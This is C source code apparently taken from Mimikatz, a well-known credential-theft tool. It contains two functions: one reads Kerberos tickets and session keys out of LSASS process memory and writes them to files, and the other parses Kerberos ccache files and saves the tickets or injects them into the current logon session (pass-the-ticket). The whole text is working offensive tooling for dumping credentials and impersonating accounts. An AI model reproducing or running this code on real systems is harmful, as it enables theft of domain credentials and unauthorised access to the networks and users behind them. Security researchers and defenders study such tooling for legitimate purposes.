void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile) { PVOID pStruct, pRef = tickets; KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS data = {&pStruct, &hBuffer}, aTicket = {NULL, &hBuffer}, aLsassBuffer = {tickets, pData->cLsass->hLsassMem}; DWORD nbTickets = 0; PKIWI_KERBEROS_TICKET pKiwiTicket; PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred; BOOL isNormalSessionKey; wchar_t * filename; if(aTicket.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structTicketSize)) { if(kull_m_memory_copy(&data, &aLsassBuffer, sizeof(PVOID))) { data.address = pStruct; data.hMemory = pData->cLsass->hLsassMem; while(data.address != pRef) { if(kull_m_memory_copy(&aTicket, &data, kerbHelper[KerbOffsetIndex].structTicketSize)) { kprintf(L"\n\t [%08x]", nbTickets); if(pKiwiTicket = kuhl_m_sekurlsa_kerberos_createTicket((LPBYTE) aTicket.address, pData->cLsass->hLsassMem)) { isNormalSessionKey = (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) || (pKiwiTicket->Key.Length < (ULONG) FIELD_OFFSET(LSAISO_DATA_BLOB, data)); kuhl_m_kerberos_ticket_display(pKiwiTicket, isNormalSessionKey, FALSE); if(isFile) if(filename = kuhl_m_sekurlsa_kerberos_generateFileName(pData->LogonId, grp, nbTickets, pKiwiTicket, MIMIKATZ_KERBEROS_EXT)) { if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket, FALSE)) { if(kull_m_file_writeData(filename, App_KrbCred, kull_m_asn1_getSize(App_KrbCred))) kprintf(L"\n\t * Saved to file %s !", filename); else PRINT_ERROR_AUTO(L"kull_m_file_writeData"); LocalFree(App_KrbCred); } LocalFree(filename); } if(!isNormalSessionKey) { kprintf(L"\n\t LSA Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType)); kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) pKiwiTicket->Key.Value); } kuhl_m_kerberos_ticket_freeTicket(pKiwiTicket); } data.address = ((PLIST_ENTRY) (aTicket.address))->Flink; } else break; nbTickets++; } } LocalFree(aTicket.address); } }
NTSTATUS kuhl_m_kerberos_ccache_enum(int argc, wchar_t * argv[], BOOL isInject, BOOL isSave) { PBYTE file, data; DWORD length, i; USHORT version; PKERB_EXTERNAL_NAME principalName; UNICODE_STRING principalRealm; PKIWI_KERBEROS_TICKET ticket; PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred; DWORD App_KrbCred_Size; wchar_t * saveFilename; if(argc) { if(kull_m_file_readData(argv[0], &file, &length)) { data = file; version = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT); if(version == 0x0504) { data += sizeof(USHORT) + _byteswap_ushort(*(PUSHORT) data); kuhl_m_kerberos_ccache_externalname(&data, &principalName, &principalRealm); if(principalName) { kuhl_m_kerberos_ticket_displayExternalName(L"\nPrincipal : ", principalName, &principalRealm); for(i = 0; data < (file + length); i++) { kprintf(L"\n\nData %u", i); if(ticket = (PKIWI_KERBEROS_TICKET) LocalAlloc(LPTR, sizeof(KIWI_KERBEROS_TICKET))) { kuhl_m_kerberos_ccache_externalname(&data, &ticket->ClientName, &ticket->AltTargetDomainName); kuhl_m_kerberos_ccache_externalname(&data, &ticket->ServiceName, &ticket->DomainName); ticket->TargetName = kuhl_m_kerberos_ticket_copyExternalName(ticket->ServiceName); kull_m_string_copyUnicodeStringBuffer(&ticket->DomainName, &ticket->TargetDomainName); ticket->KeyType = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT); ticket->TicketEncType = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT); ticket->Key.Length = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT); if(ticket->Key.Length) if(ticket->Key.Value = (PUCHAR) LocalAlloc(LPTR, ticket->Key.Length)) RtlCopyMemory(ticket->Key.Value, data, ticket->Key.Length); data += ticket->Key.Length + sizeof(DWORD); // authtime; kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->StartTime); data += sizeof(DWORD); // local ? kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->EndTime); data += sizeof(DWORD); kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->RenewUntil); data += sizeof(DWORD) + sizeof(UCHAR); // skey ticket->TicketFlags = _byteswap_ulong(*(PDWORD) data); data += sizeof(DWORD); kuhl_m_kerberos_ccache_skip_struct_with_buffer(&data); // address kuhl_m_kerberos_ccache_skip_struct_with_buffer(&data); // authdata ticket->Ticket.Length = _byteswap_ulong(*(PDWORD) data); data += sizeof(DWORD); ticket->TicketKvno = 2; if(ticket->Ticket.Length) if(ticket->Ticket.Value = (PUCHAR) LocalAlloc(LPTR, ticket->Ticket.Length)) RtlCopyMemory(ticket->Ticket.Value, data, ticket->Ticket.Length); data += ticket->Ticket.Length; kuhl_m_kerberos_ccache_skip_buffer(&data); if(!RtlEqualUnicodeString(&usXCACHECONF, &ticket->TargetDomainName, TRUE)) { kuhl_m_kerberos_ticket_display(ticket, FALSE); if(isSave || isInject) { if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(ticket, TRUE)) { App_KrbCred_Size = kull_m_asn1_getSize(App_KrbCred); if(isInject) { kprintf(L"\n\t * Injecting ticket : "); if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(App_KrbCred, App_KrbCred_Size))) kprintf(L"OK\n"); } else { if(saveFilename = kuhl_m_kerberos_ccache_generateFileName(i, ticket, MIMIKATZ_KERBEROS_EXT)) { if(kull_m_file_writeData(saveFilename, App_KrbCred, App_KrbCred_Size)) kprintf(L"\n\t * Saved to file %s !", saveFilename); else PRINT_ERROR_AUTO(L"kull_m_file_writeData"); LocalFree(saveFilename); } } LocalFree(App_KrbCred); } } } else kprintf(L"\n\t* %wZ entry? *", &usXCACHECONF); kuhl_m_kerberos_ticket_freeTicket(ticket); } } kuhl_m_kerberos_ticket_freeExternalName(principalName); } } else PRINT_ERROR(L"ccache version != 0x0504\n"); LocalFree(file); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"At least one filename is needed\n"); return STATUS_SUCCESS; }